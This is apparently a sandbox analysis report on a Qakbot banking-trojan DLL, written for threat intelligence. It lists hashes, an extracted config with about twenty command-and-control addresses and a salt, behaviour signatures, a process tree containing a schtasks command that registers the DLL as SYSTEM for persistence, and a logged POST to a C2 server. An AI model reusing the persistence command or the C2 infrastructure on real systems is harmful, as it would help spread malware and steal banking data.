Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

029b714502...39.dll

windows11_x64

10

061dfb6a25...52.dll

windows11_x64

10

06d55f75d7...d2.dll

windows11_x64

10

24401ac43b...65.dll

windows11_x64

8

260e2d5769...40.dll

windows11_x64

10

26cd036960...18.dll

windows11_x64

10

2a0a88a2e5...4a.dll

windows11_x64

10

2f33217d51...94.dll

windows11_x64

10

336cdd146b...da.dll

windows11_x64

10

417c1828d9...73.dll

windows11_x64

10

4d3095c796...ee.dll

windows11_x64

10

54e526fe05...4c.dll

windows11_x64

10

6402b33d72...3b.dll

windows11_x64

10

64c044cb3e...db.dll

windows11_x64

10

671f477c30...4e.dll

windows11_x64

10

67785724b6...ce.dll

windows11_x64

10

6c6934613a...fb.dll

windows11_x64

10

6f63742c25...fd.dll

windows11_x64

10

813a9b03c6...48.dll

windows11_x64

10

839ac59a78...e3.dll

windows11_x64

10

85d0b72fe8...39.dll

windows11_x64

10

a34cb4049e...c4.dll

windows11_x64

1

a55c19c552...60.dll

windows11_x64

1

a98e988f03...48.dll

windows11_x64

10

acc31f97c3...27.dll

windows11_x64

10

b194eec1e5...c7.dll

windows11_x64

10

bac73f9cce...00.dll

windows11_x64

10

c5d2f0da18...0c.dll

windows11_x64

10

d559ee0a26...7e.dll

windows11_x64

8

db5276c0d5...79.dll

windows11_x64

10

e5efde9740...15.dll

windows11_x64

10

fe028e6f99...1c.dll

windows11_x64

10

Resubmissions

01/11/2021, 12:31 UTC

211101-pp5r3ahha4 10

31/10/2021, 09:03 UTC

211031-k1bwxacfaq 10

14/10/2021, 01:44 UTC

211014-b6aflafeg4 10

Analysis

  • max time kernel
    598s
  • max time network
    611s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    01/11/2021, 12:31 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll

  • Size

    1.0MB

  • MD5

    10c150a949585ba3603cce27707331f0

  • SHA1

    9eeb1747902951835245545b7b3b1e6408c708c2

  • SHA256

    260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840

  • SHA512

    668ea267488635b88ef6a929501f8f6b34a02ccb2fa01a311caf89f5c683f0dd6877d8714ddf8b6b24e7a447c40f2cf5c42698638a52ff7b27e6c47ce4f4578b

Score
10/10
qakbottr1633334141bankerpersistencestealertrojan

Malware Config

Extracted

Family

qakbot

Version

402.363

Botnet

tr

Campaign

1633334141

C2

75.75.179.226:443

185.250.148.74:443

122.11.220.212:2222

120.150.218.241:995

103.148.120.144:443

140.82.49.12:443

40.131.140.155:995

206.47.134.234:2222

73.230.205.91:443

190.198.206.189:2222

103.157.122.198:995

81.250.153.227:2222

167.248.100.227:443

96.57.188.174:2078

217.17.56.163:2222

217.17.56.163:2078

41.228.22.180:443

136.232.34.70:443

68.186.192.69:443

167.248.111.245:443
Attributes
  • salt

    jHxastDcds)oMc=jvh7wdUhxcsdt2

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

    trojanbankerstealerqakbot
  • Sets service image path in registry 2 TTPs
    persistence
  • Drops file in Windows directory 8 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll,#1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:920
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ewvwcyddvg /tr "regsvr32.exe -s \"C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll\"" /SC ONCE /Z /ST 07:54 /ET 08:06
          4⤵
          • Creates scheduled task(s)
          PID:4056
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe d24bb2d71bcbb36c2a75cc2dfbe6920d zpztTPQJb0KSdWS/IXZ/5g.0.1.0.3.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:948
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:1872
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
    1⤵
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2564
    • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
      C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
      2⤵
        PID:1244
    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe
      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe -Embedding
      1⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
    • C:\Windows\System32\WaaSMedicAgent.exe
      C:\Windows\System32\WaaSMedicAgent.exe d24bb2d71bcbb36c2a75cc2dfbe6920d zpztTPQJb0KSdWS/IXZ/5g.0.1.0.3.0
      1⤵
      • Modifies data under HKEY_USERS
      PID:2604
    • C:\Windows\System32\WaaSMedicAgent.exe
      C:\Windows\System32\WaaSMedicAgent.exe d24bb2d71bcbb36c2a75cc2dfbe6920d zpztTPQJb0KSdWS/IXZ/5g.0.1.0.3.0
      1⤵
      • Modifies data under HKEY_USERS
      PID:3416

    Network

    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      52.242.101.226
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      20.54.89.106
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      104.110.191.140
      a767.dspw65.akamai.net
      IN A
      104.110.191.133
    • flag-us
      DNS
      settings-win.data.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      settings-win.data.microsoft.com
      IN A
      Response
      settings-win.data.microsoft.com
      IN CNAME
      settingsfd-geo.trafficmanager.net
      settingsfd-geo.trafficmanager.net
      IN CNAME
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      IN A
      51.124.78.146
    • flag-us
      DNS
      config.edge.skype.com
      Remote address:
      8.8.8.8:53
      Request
      config.edge.skype.com
      IN A
      Response
      config.edge.skype.com
      IN CNAME
      config.edge.skype.com.trafficmanager.net
      config.edge.skype.com.trafficmanager.net
      IN CNAME
      l-0007.config.skype.com
      l-0007.config.skype.com
      IN CNAME
      config-edge-skype.l-0007.l-msedge.net
      config-edge-skype.l-0007.l-msedge.net
      IN CNAME
      l-0007.dc-msedge.net
      l-0007.dc-msedge.net
      IN A
      13.107.43.16
    • flag-us
      DNS
      nexusrules.officeapps.live.com
      Remote address:
      8.8.8.8:53
      Request
      nexusrules.officeapps.live.com
      IN A
      Response
      nexusrules.officeapps.live.com
      IN CNAME
      prod.nexusrules.live.com.akadns.net
      prod.nexusrules.live.com.akadns.net
      IN A
      52.109.12.18
    • flag-us
      DNS
      time.windows.com
      Remote address:
      8.8.8.8:53
      Request
      time.windows.com
      IN A
      Response
      time.windows.com
      IN CNAME
      twc.trafficmanager.net
      twc.trafficmanager.net
      IN A
      20.101.57.9
    • flag-us
      DNS
      login.live.com
      Remote address:
      8.8.8.8:53
      Request
      login.live.com
      IN A
      Response
      login.live.com
      IN CNAME
      login.msa.msidentity.com
      login.msa.msidentity.com
      IN CNAME
      www.tm.lg.prod.aadmsa.akadns.net
      www.tm.lg.prod.aadmsa.akadns.net
      IN CNAME
      prda.aadg.msidentity.com
      prda.aadg.msidentity.com
      IN CNAME
      www.tm.a.prd.aadg.akadns.net
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.2
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.4
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.69
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.71
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.132
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.8
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.73
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.134
    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      40.125.122.176
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      95.101.78.193
      a767.dspw65.akamai.net
      IN A
      95.101.78.209
    • flag-us
      DNS
      ocsp.digicert.com
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.com
      IN A
      Response
      ocsp.digicert.com
      IN CNAME
      cs9.wac.phicdn.net
      cs9.wac.phicdn.net
      IN A
      93.184.220.29
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.110.14
    • flag-us
      DNS
      settings-win.data.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      settings-win.data.microsoft.com
      IN A
      Response
      settings-win.data.microsoft.com
      IN CNAME
      settingsfd-geo.trafficmanager.net
      settingsfd-geo.trafficmanager.net
      IN CNAME
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      IN A
      51.124.78.146
    • flag-us
      DNS
      fs.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fs.microsoft.com
      IN A
      Response
      fs.microsoft.com
      IN CNAME
      prod.fs.microsoft.com.akadns.net
      prod.fs.microsoft.com.akadns.net
      IN CNAME
      fs-wildcard.microsoft.com.edgekey.net
      fs-wildcard.microsoft.com.edgekey.net
      IN CNAME
      fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
      fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
      IN CNAME
      e1723.g.akamaiedge.net
      e1723.g.akamaiedge.net
      IN A
      104.80.224.57
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      104.110.191.140
      a767.dspw65.akamai.net
      IN A
      104.110.191.133
    • flag-us
      DNS
      s2.symcb.com
      Remote address:
      8.8.8.8:53
      Request
      s2.symcb.com
      IN A
      Response
      s2.symcb.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      sv.symcd.com
      Remote address:
      8.8.8.8:53
      Request
      sv.symcd.com
      IN A
      Response
      sv.symcd.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      s.symcd.com
      Remote address:
      8.8.8.8:53
      Request
      s.symcd.com
      IN A
      Response
      s.symcd.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      ts-ocsp.ws.symantec.com
      Remote address:
      8.8.8.8:53
      Request
      ts-ocsp.ws.symantec.com
      IN A
      Response
      ts-ocsp.ws.symantec.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      ocsp.verisign.com
      Remote address:
      8.8.8.8:53
      Request
      ocsp.verisign.com
      IN A
      Response
      ocsp.verisign.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      mrodevicemgr.officeapps.live.com
      Remote address:
      8.8.8.8:53
      Request
      mrodevicemgr.officeapps.live.com
      IN A
      Response
      mrodevicemgr.officeapps.live.com
      IN CNAME
      prod.mrodevicemgr.live.com.akadns.net
      prod.mrodevicemgr.live.com.akadns.net
      IN A
      52.109.88.44
    • flag-us
      DNS
      tsfe.trafficshaping.dsp.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      tsfe.trafficshaping.dsp.mp.microsoft.com
      IN A
      Response
      tsfe.trafficshaping.dsp.mp.microsoft.com
      IN CNAME
      tsfe.trafficmanager.net
      tsfe.trafficmanager.net
      IN A
      20.54.110.119
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      104.110.191.140
      a767.dspw65.akamai.net
      IN A
      104.110.191.133
    • flag-in
      POST
      https://136.232.34.70/t4
      explorer.exe
      Remote address:
      136.232.34.70:443
      Request
      POST /t4 HTTP/1.1
      Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
      Host: 136.232.34.70
      Content-Length: 77
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.9.12
      Content-Length: 146
    • 52.242.101.226:443
      slscr.update.microsoft.com
      tls
      1.3kB
       3.3kB
       12
      9
    • 52.152.108.96:443
      fe3cr.delivery.mp.microsoft.com
      tls
      1.2kB
       3.1kB
       12
      9
    • 52.242.101.226:443
      slscr.update.microsoft.com
      tls
      1.2kB
       3.2kB
       12
      9
    • 52.242.101.226:443
      slscr.update.microsoft.com
      tls
      1.3kB
       3.3kB
       12
      9
    • 51.124.78.146:443
      settings-win.data.microsoft.com
      tls
      1.5kB
       9.2kB
       14
      14
    • 40.125.122.176:443
      slscr.update.microsoft.com
      tls
      1.3kB
       3.3kB
       12
      9
    • 127.0.0.1:5985
    • 52.152.108.96:443
      fe3cr.delivery.mp.microsoft.com
      tls
      1.2kB
       3.1kB
       12
      9
    • 40.125.122.176:443
      slscr.update.microsoft.com
      tls
      1.2kB
       3.2kB
       12
      9
    • 51.124.78.146:443
      settings-win.data.microsoft.com
      tls, https
      1.8kB
       8.1kB
       14
      14
    • 51.124.78.146:443
      settings-win.data.microsoft.com
      tls, https
      MoUsoCoreWorker.exe
      2.0kB
       14.6kB
       16
      18
    • 40.125.122.176:443
      slscr.update.microsoft.com
      tls, https
      wuauserv
      1.3kB
       3.3kB
       12
      9
    • 20.54.110.119:443
      tsfe.trafficshaping.dsp.mp.microsoft.com
      tls, https
      wuauserv
      2.7kB
       6.0kB
       14
      12
    • 20.86.173.234:80
      46 B
       1
    • 52.168.112.66:443
      322 B
       7
    • 97.98.130.50:443
      explorer.exe
      156 B
       3
    • 97.98.130.50:443
      explorer.exe
      156 B
       3
    • 97.98.130.50:443
      explorer.exe
      156 B
       3
    • 97.98.130.50:443
      explorer.exe
      156 B
       3
    • 73.52.50.32:443
      explorer.exe
      156 B
       3
    • 73.52.50.32:443
      explorer.exe
      156 B
       3
    • 73.52.50.32:443
      explorer.exe
      156 B
       3
    • 73.52.50.32:443
      explorer.exe
      156 B
       3
    • 70.37.217.196:443
      explorer.exe
      156 B
       3
    • 70.37.217.196:443
      explorer.exe
      156 B
       3
    • 70.37.217.196:443
      explorer.exe
      156 B
       3
    • 70.37.217.196:443
      explorer.exe
      156 B
       3
    • 216.201.162.158:443
      explorer.exe
      156 B
       3
    • 216.201.162.158:443
      explorer.exe
      156 B
       3
    • 216.201.162.158:443
      explorer.exe
      156 B
       3
    • 216.201.162.158:443
      explorer.exe
      156 B
       3
    • 136.232.34.70:443
      https://136.232.34.70/t4
      tls, http
      explorer.exe
      1.9kB
       1.7kB
       11
      7

      HTTP Request

      POST https://136.232.34.70/t4

      HTTP Response

      200
    • 81.250.153.227:2222
      explorer.exe
      156 B
       3
    • 81.250.153.227:2222
      explorer.exe
      156 B
       3
    • 81.250.153.227:2222
      explorer.exe
      156 B
       3
    • 81.250.153.227:2222
      explorer.exe
      156 B
       3
    • 8.8.8.8:53
      slscr.update.microsoft.com
      dns
      1.9kB
       4.9kB
       27
      27

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      52.242.101.226

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      20.54.89.106

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      104.110.191.140
      104.110.191.133

      DNS Request

      settings-win.data.microsoft.com

      DNS Response

      51.124.78.146

      DNS Request

      config.edge.skype.com

      DNS Response

      13.107.43.16

      DNS Request

      nexusrules.officeapps.live.com

      DNS Response

      52.109.12.18

      DNS Request

      time.windows.com

      DNS Response

      20.101.57.9

      DNS Request

      login.live.com

      DNS Response

      20.190.160.2
      20.190.160.4
      20.190.160.69
      20.190.160.71
      20.190.160.132
      20.190.160.8
      20.190.160.73
      20.190.160.134

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      40.125.122.176

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      95.101.78.193
      95.101.78.209

      DNS Request

      ocsp.digicert.com

      DNS Response

      93.184.220.29

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      52.152.110.14

      DNS Request

      settings-win.data.microsoft.com

      DNS Response

      51.124.78.146

      DNS Request

      fs.microsoft.com

      DNS Response

      104.80.224.57

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      104.110.191.140
      104.110.191.133

      DNS Request

      s2.symcb.com

      DNS Response

      23.51.123.27

      DNS Request

      sv.symcd.com

      DNS Response

      23.51.123.27

      DNS Request

      s.symcd.com

      DNS Response

      23.51.123.27

      DNS Request

      ts-ocsp.ws.symantec.com

      DNS Response

      23.51.123.27

      DNS Request

      ocsp.verisign.com

      DNS Response

      23.51.123.27

      DNS Request

      mrodevicemgr.officeapps.live.com

      DNS Response

      52.109.88.44

      DNS Request

      tsfe.trafficshaping.dsp.mp.microsoft.com

      DNS Response

      20.54.110.119

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      104.110.191.140
      104.110.191.133

    • 20.101.57.9:123
      time.windows.com
      ntp
      76 B
       1

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/920-152-0x0000000074A70000-0x0000000074A91000-memory.dmp

      Filesize

      132KB

      Download

    • memory/920-154-0x0000000002EF0000-0x0000000002EF1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/920-153-0x0000000074A70000-0x000000007547C000-memory.dmp

      Filesize

      10.0MB

      Download

    • memory/920-151-0x0000000074A70000-0x000000007547C000-memory.dmp

      Filesize

      10.0MB

      Download

    • memory/1872-149-0x000001A23BA10000-0x000001A23BA14000-memory.dmp

      Filesize

      16KB

      Download

    • memory/1872-148-0x000001A2394E0000-0x000001A2394F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1872-147-0x000001A238D60000-0x000001A238D70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4032-157-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4032-158-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4032-159-0x00000000003C0000-0x00000000003E1000-memory.dmp

      Filesize

      132KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.